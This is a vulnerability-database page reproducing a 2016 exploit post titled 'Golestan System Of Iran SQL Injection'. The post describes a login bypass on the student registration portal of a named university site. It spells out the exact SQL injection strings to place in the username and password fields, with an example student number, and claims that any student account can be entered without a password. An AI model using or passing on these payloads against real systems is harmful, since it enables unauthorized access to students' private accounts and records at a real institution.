Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Golestan System Of Iran SQL Injection

🗓️ 22 Jan 2016 00:00:00Reported by 4TT4CK3RType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 73 Views

Golestan System Of Iran SQL Injection vulnerability bypasses login without passwor

Code
`###################################################################################################  
#  
# In The Name Of God  
#  
# Exploit Title : Golestan System Of Iran Login Bypass Vulnerability  
#  
# Exploit Author : 4TT4CK3R  
#  
# Tested on : Internet Explorer , Kali Linux , Windows 8.1  
#  
# HomePage : https://reg.pnu.ac.ir  
#  
# Vendor Page : https://reg1.pnu.ac.ir/forms/authenticateuser/main.htm  
#  
# Thanks to : Behrooz  
#  
###################################################################################################  
#  
# Description of this vulnerability :  
# This Bug is an Bypass vulnerability that you can Login into any Student panel  
# in the reg.pnu.ac.ir !!!  
# In this vulnerability you need only for student number and no need  
for password.  
# Pattern and Code Bypass is :  
# 'or'='=StudentNumber='='or'  
#  
# For example if our student Number be: 935136315 Our bypass code will be :  
# 'or'='=935136315='='or'  
# Therefore we have for Username ==>> 'or'='=935136315='='or'  
# And We have for Password ==>> '='or'  
#  
# Ok ... this vulnerability include all student numbers of reg.pnu.ac.ir  
#  
#  
###################################################################################################  
#  
# Video of this vulnerability on the SendVid :  
# https://sendvid.com/ugelugl1  
#  
# Video of this vulnerability on the Videosprout :  
# http://www.videosprout.com/video?id=80444105-655d-40f0-abd1-30e201df3b50  
#  
###################################################################################################  
#  
# Exploited by : 4TT4CK3R  
# We LovE IraN  
# :: Open Vendor Page with IE Browser.  
#  
###################################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jan 2016 00:00Current
golestan systemiransql injectionlogin bypassvulnerabilitystudent panelreg.pnu.ac.irbypass code
73